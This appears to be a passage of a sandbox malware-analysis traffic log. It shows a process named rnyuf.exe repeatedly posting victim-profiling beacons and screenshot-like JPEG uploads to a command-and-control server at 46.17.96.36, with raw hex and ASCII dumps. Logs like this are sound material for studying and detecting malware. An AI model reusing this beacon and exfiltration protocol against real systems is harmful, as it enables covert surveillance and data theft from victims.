                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:13.575000048 CEST2262OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:13.575018883 CEST2264OUTData Raw: 50 67 ce f8 cd 30 83 9e 6b e8 e5 f0 d6 88 07 fc 82 ed 7f ef 8a f3 3f 89 9a 7d 9d 95 cd 97 d9 2d a2 83 72 36 e1 18 c6 79 aa 85 5e 77 60 92 e5 3c 8e 93 14 99 a5 15 c6 7a 07 a6 fc 0d e3 c6 b7 bf f6 0e 7f fd 19 1d 7b ad f3 e2 df 1f de 60 3f af f4 af
                                        Data Ascii: Pg0k?}-r6y^w`<z{`?t}fA4;;;]> x!GVP)F{0T]Il;j|~)k%o1)qIJ+,)i3@4uR)<:s^Q_YH;x~^S
                                        Aug 29, 2021 22:27:13.673710108 CEST2312INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:13 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        110192.168.2.44984846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:48.944394112 CEST10104OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:49.021600008 CEST10118INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        111192.168.2.44984946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:49.015767097 CEST10104OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:49.015853882 CEST10105OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:49.016001940 CEST10115OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:49.016089916 CEST10117OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:49.047972918 CEST10123OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:49.048038960 CEST10126OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:49.048887968 CEST10129OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:49.049113035 CEST10143OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:49.080166101 CEST10154OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:49.080219030 CEST10159OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:27:49.080792904 CEST10162OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:49.179480076 CEST10216INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        112192.168.2.44985046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:49.178303003 CEST10216OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:49.251554966 CEST10217INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        113192.168.2.44985146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:49.396509886 CEST10218OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:49.468354940 CEST10257INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        114192.168.2.44985246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:49.427496910 CEST10218OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:49.427654028 CEST10218OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:49.427921057 CEST10228OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:49.428134918 CEST10231OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:49.463176012 CEST10237OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:49.463251114 CEST10251OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:49.463284016 CEST10254OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:49.463598967 CEST10256OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:49.500025034 CEST10268OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:49.500067949 CEST10276OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:27:49.500086069 CEST10286OUTData Raw: 50 67 ce f8 cd 30 83 9e 6b e8 e5 f0 d6 88 07 fc 82 ed 7f ef 8a f3 3f 89 9a 7d 9d 95 cd 97 d9 2d a2 83 72 36 e1 18 c6 79 aa 85 5e 77 60 92 e5 3c 8e 93 14 99 a5 15 c6 7a 07 a6 fc 0d e3 c6 b7 bf f6 0e 7f fd 19 1d 7b ad f3 e2 df 1f de 60 3f af f4 af
                                        Data Ascii: Pg0k?}-r6y^w`<z{`?t}fA4;;;]> x!GVP)F{0T]Il;j|~)k%o1)qIJ+,)i3@4uR)<:s^Q_YH;x~^S
                                        Aug 29, 2021 22:27:49.609601021 CEST10329INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        115192.168.2.44985346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:49.615452051 CEST10330OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:49.685024977 CEST10330INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        116192.168.2.44985446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:49.860125065 CEST10331OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:49.936300039 CEST10345INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        117192.168.2.44985546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:49.914906979 CEST10332OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:49.915133953 CEST10332OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:49.915442944 CEST10342OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:49.915528059 CEST10345OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:49.948689938 CEST10348OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:49.948729992 CEST10358OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:49.948911905 CEST10370OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:49.982358932 CEST10397OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:49.982424021 CEST10412OUTData Raw: ff 00 0a eb c5 7e 5e 7c cf 9f 6e 3a e7 ca 38 a8 aa b9 92 5e 66 94 e5 ca db 3b 78 8d ff 00 8e ae 25 95 6e e6 b1 d0 23 72 91 88 4e d9 2e 48 ea 49 ec 3f cf 5a 98 78 0b c3 6c cc 96 93 4d 0d d2 7f cb 48 6e 89 91 4f af 7f e5 4e b1 f3 bf e1 56 47 fd 97
                                        Data Ascii: ~^|n:8^f;x%n#rN.HI?ZxlMHnONVG?'gwc9ktBg>c?s]49*rQv:9]H9+Gh+_SAJ\8%_oGZ(1ATY%oW/,98]?R,'{5
